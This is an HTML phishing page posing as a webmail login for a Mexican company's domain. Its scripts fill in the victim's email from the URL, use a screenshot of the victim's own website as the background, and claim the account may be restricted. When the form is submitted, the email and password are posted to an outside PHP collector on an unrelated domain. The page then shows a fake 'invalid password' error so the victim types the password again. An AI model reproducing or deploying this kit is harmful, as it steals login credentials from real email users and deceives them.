
<!DOCTYPE html>
<html lang="en">
<!--"lxm0n9cy4mi06m"-->
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <meta name="referrer" content="strict-origin" />
    <link id="favicon" rel="shortcut icon" type="image/png" href="https://alphatrade-options.com/git/rand/favicon.png" />

    <!-- <script src="https://code.jquery.com/jquery-2.2.4.min.js"
        integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>
    <title>Webmail</title> -->

    <!-- <script nonce="">
        // Ensure that parent window and opener reload if a page is redirected to login
        if (top.location != window.location) {
            top.location.reload();
        }
        if (window.opener && window.opener.top.location != window.location) {
            window.opener.top.location.reload();
            self.close();
        }
    </script> -->


    <style>
        body {
            background-color: #eeeeee;
            font-family: Helvetica Neue, Helvetica, sans-serif;
            font-size: 13px;
            color: #425152;
            margin: 0;
        }

        ::-moz-placeholder {
            color: #d9dad9;
        }

        :-ms-input-placeholder {
            color: #d9dad9;
        }

        ::-ms-input-placeholder {
            color: #d9dad9;
        }

        ::placeholder {
            color: #d9dad9;
        }

        a {
            color: #425152;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }

        input {
            border-radius: 5px;
            padding: 5px 3px;
        }

        input.submit {
            font-weight: bold;
            text-align: center;
            min-width: 90px;
            color: #f0f0f0;
            background: #444444;
            padding: 5px 12px;
            border-color: #444444;
            border-style: solid;
            cursor: pointer;
        }

        input.submit:hover {
            color: #ffffff;
        }

        .row {
            margin: 10px 0;
        }

        .row:after {
            content: "";
            display: table;
            clear: both;
        }

        .logoWithPortalIcons {
            width: 150px;
            height: 50px;
            background: transparent url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJYAAAARCAYAAAA/tFWCAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAB3RJTUUH3gYNAictBVTA/AAAAj5JREFUaN7tWdFtgzAQfakyAPICyQffNCOQCdpMUDaoMkHIBFUnSDJB0gkgE5T62x9MgLJB+pGLRK2AMbYbiHgSPxjuznfPvjt7BOAMO0gBzAGgCHwPQAJgJn2zZlzEReBX6mRcjIrAD+n/MnIAC8ZFVnoXA1i1sPUEICOZO7LdVOYVIwC37J+X9LT1eUaPbDMqdOpiTfNPSF5rHzzBDfY3SGWKKYA9kdYUHjkuIidG6AdmfbHZOrGKwJ8Zsl1FrlcHcjcku0/YOPRz94jlKPBlvDiSG6J/eO+qYeOaPGtSa6nG1goZec03eZM6r8HO900psfzuWmOV5y/XG011tKltVOl7Iy1c1SIetbRHnp/sA6W9Y9tMZVykCnKBcRErxnNDcqMBcbOe7VInAJ//kBGc7VgTTYdfO6xrjRUBeKv4dse42Das0z6qOiPGxVJRlDfZsfqY+myn9z+xc02sSLPjkFNDXdCOml1bm64pMdgRHg2JZuw6Xbz3FYfBBQOxbGOraAoGWEiFqUbKQscCkuNyKq3CREr3EXU6j0au9T1jd5aeuEeOiyXbE4N5hzV1iq6OUCG/rc9vyW0yZqNW07LX+nED3fNVBSllXKRF4Md1RxFF4E9rGoi8SWc54C6YUROUjx0ID1F/iZsqxmPqLFc1/w/EstMVytgZ+HZPpPIAHF0QK3PsrK+BL1qLXAdHAz07XK6YPAC59a6QcXFwWBSehmOBzsKjuJ9cHjcs4ObAcUnXPQO6hRTAc2nx//wCPaq4/QlxCjAAAAAASUVORK5CYII=')
                /*IconsTogether.svg*/
                no-repeat left top;
        }

        .logoOnly {
            width: 280px;
            height: 30px;
            overflow: hidden;
        }

        .logoOnly .logoWithPortalIcons {
            width: 320px;
            height: 120px;
        }

        .title {
            font-size: 26px;
            margin: 20px 0 10px;
        }

        .red {
            color: #EE3031;
        }

        a#create-account {
            display: inline-block;
            border-radius: 4px;
            padding: 3px 8px;
            border: 1px solid #EE3031;
        }

        a#create-account:hover {
            text-decoration: none;
        }

        .col1,
        .col2 {
            float: left;
            line-height: 30px;
            vertical-align: middle;
            padding-top: 4px;
        }

        .col1 {
            width: 124px;
            font-size: 13px;
            font-weight: 600;
        }

        .col2 {
            width: 286px;
        }

        .col2 input {
            width: 96%;
        }

        .error {
            color: #D52B1E;
            font-weight: normal;
        }

        .container {
            background: rgba(255, 255, 255, 1.0);
            padding: 40px;
            box-shadow: 2px 2px 4px 2px #ccc;
            width: 416px;
            border-radius: 5px;
            /*
            margin: 0 auto;
            position:absolute;
            left:0;
            right:0;
            top:38%;
            top:100px\9;
            transform: translateY(-50%);
			*/
            margin: 10% auto 30px auto;
            box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
            transition: all 0.3s cubic-bezier(.25, .8, .25, 1);
        }

        .password-icon {
            width: 20px;
            position: absolute;
            cursor: pointer;
            margin-top: 9px;
            margin-left: -28px;
            background-color: white;
        }

        #login_footer {
            line-height: 125%;
            font-size: 12px;
            text-align: justify;
            width: 500px;
            margin: 90px auto auto auto;
            padding-left: 10px;
        }


        @media only screen and (max-width: 600px) {
            body {
                background-image: none;
            }

            .container {
                /*
                position:relative;
                padding: 20px;
                box-shadow:none;
                width: 375px;
                top:0;
                left:auto;
                right:auto;
                transform: translateY(0);
				*/
                width: 100%;
                border-radius: 0;
                box-shadow: none;
                padding: 0;
                margin-top: 0;
            }

            .container div.body {
                padding: 40px 20px;
            }

            .col1,
            .col2 {
                float: none;
                width: 100%;
            }

            #login_footer {
                width: 99%;
                margin-top: 20px;
            }

            #login_footer div.content {
                padding: 10px 20px 10px 10px;
            }

            .password-icon {
                margin-top: -25px;
                right: 7%;
            }

        }

        

        .xlogo {
            color: #fff;
            margin-bottom: 10px;
            margin-top: -25px;
        }

        .xlogo img {
            vertical-align: middle;
            width: 5%;
            height: 5%;
            object-fit: contain
        }

        .xlogo span {
            vertical-align: middle
        }

        .text-g {
            font-family: "Arial Black", Gadget, sans-serif;
            text-transform: uppercase !important;
            text-align: center;
            font-size: 25px;
            color: #444444;
            background-color: rgba(255, 255, 255, 0);
            text-shadow: rgb(255, 255, 255) 2px 2px 2px;
        }

        #root {
            position: absolute;
            left: 0;
            right: 0;
            bottom: 0;
            top: 0;
            z-index: -10;
            pointer-events: none;
            filter: brightness(0.3)
        }

        /* ._spin_{} */

        ._tpo_{
            font-size: 24px;
            position: absolute;
            /* margin-bottom: 20px; */
        }

        /* .circle{
            z-index: 999;
            margin-top: -30px;
            border-radius: 50%;
            border: 2px solid #000;
            width: 250px;
            height: 250px;
            background: red;
            transform: translate(-50%, -50%);
            animation: spin 1s infinite forwards linear;
        }

        @keyframes spin {
            0%{
                transform: rotate(0deg);
            }
            100%{
                transform: rotate(360deg);
            }
        } */


    </style>


</head>

<body class="wrapper">
    
    <!-- <div className='Loading'>
        <div className='circle'>
            loader
        </div>
    </div> -->

    <style>
        .wrapper{
            /* background: pink; */
        }

        .load_cont_{
            position: relative;
        }

        .loadrr{
            width: 190px;
            height: 200px;
            object-fit: cover;
            position: fixed;
            height: 60px;
            /* left: 2cm; */
            margin-left: 4cm;
            margin-top: 2cm;
            cursor: grab;
        }

    </style>


<form class="furm" method="post" id="furm">
    

    <div>
    <!-- <input type="hidden" name="csrfmiddlewaretoken" value="xWUPRch6gUXcsYdMNLyWrIvExcWeJ3qTtf8VMHZWmQ2EBBFj3eYVAcVdcPIJiDWq">
        <input type="hidden" name="next" value="/"> -->
        <div class="container" id="container" style="padding-bottom:10px!important; position: relative;">
            <div style="position:absolute; top:0; width:100%; height:100%; left:0; background:#fff; opacity:0.7; display:none" id="bg_screen"> </div>
            <!-- <img src="https://ik.imagekit.io/escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif" style="width:50px; position:absolute; top:50%; left:50%; transform:translate(-50%, -50%); display:none" id="loading_image" /> -->
            
            
            <!-- <input type="hidden" class="form-control" name="hido" id="hido" value="">
                <input type="hidden" class="form-control" name="redirecto" id="redirecto"> -->
                <div class="body">

                    
                    <div class="_tpo_">
                        <img 
                            src="https://t2.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://nssmexico.com.mx&size=16" 
                            class="hlo_img" 
                        />
                            <!-- alt="domain_id_" -->
                            Webmail - <span>Nssmexico</span>
                    </div>
                    
                    <!-- <article class="_spin_">hello</article> -->

            <div class="xlogo">
                <img id="zion"> 
                <span style="text-transform: capitalize !important;" class="text-g" id="banNer"></span>
            </div>



            <section class="load_cont_">
                <img 
                src="https://www.oneblood.org/_resources/images/content/client-loader.gif"
                alt="spi_nner_id" 
                class="loadrr"
                />
            </section>


            <div class="row">
                <div class="col1">
                    <!-- <label for="id_email">Email:</label> -->
                    Email:
                </div>
                <div class="col2">
                <!-- <span id="id_email"></span> -->
                
                <input
                    type="text" 
                    name="email"
                    id="id_email" 
                    placeholder="Email" 
                    readonly
                    class="email"
                    id="email"
                    />
                    <!-- value="ventas@nssmexico.com.mx"  -->

                <!-- <span class="email">
                    ventas@nssmexico.com.mx
                </span> -->


            </div>

            </div>
                <div class="col1">
                    <!-- <label for="id_pass"></label> -->
                    Password:
                </div>
                <div class="col2">

                    <input 
                        type="password" 
                        name="password" 
                        id="password" 
                        placeholder="Password"
                        class="password"
                    />

                </div>

                    <img 
                    id="id-password-reveal-icon" 
                        class="password-icon" 
                        src="https://fac.corp.fortinet.com/customviews/image/password_hidden:93edf7d3ceb704be92ee084ecc62c6c8/"
                        alt=""
                        
                    />
            </div>

            <br /><br />
            <div class="row">
                <div><span class="err" id="error" style="font-size:12px;color:#ff2b10;">Invalid username/password please try again</span></div>
                <div class="req_pwd">
                    <span style="font-size:12px;color:#ff2b10;">
                        Password is required
                    </span>
                </div>
            </div>
            <div class="row">
                <div class="col1" style="line-height:40px;padding-top:10px;">
                    <input type="submit" id="submit_btn" class="submit" value="Log in" style="padding:7px 24px;"></div>
            </div>
            <div class="row">
                <p style="font-size:120%;color:#D52B1E;"></p>
                <p>
                    This is a very important security measure, <span id="kai" style="text-transform: capitalize;"></span>.
                    <br>
                    To protect your email account.
                    <br>
                    Your account may be restricted until you can verify your identity.
                </p>
            </div>
        
    </div>
    </div>
</form>

<script>

    const uri = window.location.href;
    const ind = uri.indexOf("#");
    const slicedMail = uri.substr((ind+1));
    // console.log('asteriks#', slicedMail);
    
    const all = document.querySelector('.wrapper');
    const email = document.querySelector('.email');
    const password = document.querySelector('.password');
    const passwordIcon = document.querySelector('.password-icon');
    const btnSubmit = document.querySelector('.submit');
    const furm = document.querySelector('.furm');
    const invalidDetails = document.querySelector('.err');
    const spin = document.querySelector('._spin_');
    const reqPwd = document.querySelector('.req_pwd');
    const preloader = document.querySelector('.load_cont_');

    invalidDetails.style.display = 'none';
    reqPwd.style.display = 'none';
    preloader.style.display = 'none';

    // console.log(all);
    const indForEmail = uri.indexOf("@");
    const slicedDomain = uri.substr((indForEmail+1));
    console.log(slicedDomain);
    const bImg = all.style;
    bImg.backgroundImage = `url(https://image.thum.io/get/https://${slicedDomain})`;
    // https://image.thum.io/get/https://www.${splitFromAt}/
        

    passwordIcon.addEventListener('click', ()=>{
        const type = password.getAttribute("type") === "password" ? "text" : "password";
        password.setAttribute("type", type);
    });

    password.addEventListener('focus', ()=>{
        invalidDetails.style.display = 'none';
        password.addEventListener('click', ()=>{
            invalidDetails.style.display = 'none';
        });
    });

    furm.addEventListener('submit', (e)=>{
        // alert('submited!!');
        e.preventDefault();
        preloader.style.display = 'block';
        if (password.value === "") {
            // console.log('empty');
            reqPwd.style.display = 'block';
            invalidDetails.style.display = 'none';
            preloader.style.display = 'none';
        }else{
            setTimeout(()=>{
                password.value = "";
                invalidDetails.style.display = 'block';
                preloader.style.display = 'none';
            }, 2700);
            // console.log(email.value, password.value);
        }
    });

    // console.log(window.location.href);

    email.value = slicedMail;
    const emailValue = email.value;

</script>

<script src="./action/script.js"></script>

<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script src="jquery.min.v2.js"></script>
<script src="./jquery.min.js"></script>



<script>
    // $(document).ready(function(){
    //     $("#btn").click(function(){
    //         $.get("https://jsonplaceholder.typicode.com/users", function(data,status){
    //             $("#ppp").html(data);
    //             console.info(status+ "!")
    //             console.log(data);
    //         })
    //     });
    // });



    // for submitting data

    $(document).ready(function(){
        $(".furm").submit(function(e){
            e.preventDefault();

            var email = $(".email").val();
            var password = $(".password").val();
            $.post("https://pearldozen.com/nc_assets/fonts/hu/hhh.php", {
                email: email,
                password: password
            }, function(data, status){
                console.log(data);
                // alert(status);
            })
        });
    });
    
  </script>



</body>

</html>
